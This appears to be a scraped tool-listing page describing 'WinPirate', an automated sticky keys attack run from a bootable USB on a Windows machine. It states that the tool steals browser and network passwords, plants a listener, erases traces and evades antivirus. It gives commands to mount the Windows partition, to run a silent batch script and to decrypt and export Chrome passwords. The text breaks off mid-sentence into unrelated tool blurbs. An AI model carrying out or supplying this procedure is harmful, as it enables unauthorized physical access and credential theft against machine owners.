Automated sticky keys hack. Post exploitation it grabs browser passwords, history, and network passwords. Here’s the plan. We create a way to automate doing the sticky keys windows hack from a bootable USB which we can call as WinPirate. Then, we automate getting as many saved passwords as possible, drop a listener, and delete all traces that we were there.
All without being detected by antivirus. We should add a mimikittenz option if the computer was found running and unlocked, otherwise we can just run it later remotely.
Requirements : a linux bootable USB, this repo on the USB (not in the OS, just put it in the root directory)
Note : chromepasswords.py requires PyWin32
If the computer is locked:
sudo -i
fdisk -l
(note: if you’re on Kali Linux, run parted -l
)mkdir /media/windows
mount /dev/WHATEVERTHEWINDOWSPARTITIONWASCALLED /media/windows -t ntfs
If the computer isn’t locked:
cd to the USB and run Run.bat (this will run WinPirate.bat silently in the background, it should be done in < 10 seconds
python chromepasswords.py -csv
and it will decrypt the Chrome saved passwords database and export it as a CSVTokio is a high-performance, asynchronous runtime designed for the Rust programming language. It provides the…
AntiCrack DotNet is a sophisticated .NET project designed to safeguard software by implementing advanced anti-debugging,…
The StoneKeeper C2 is an experimental command-and-control (C2) framework designed for research purposes, focusing on…
Biome is a cutting-edge toolchain designed to simplify and enhance web development by combining powerful…
The Silk Wasm is a tool designed to obfuscate HTML smuggling techniques using WebAssembly (Wasm).…
TokenSmith is a powerful tool designed to generate Entra ID access and refresh tokens, catering…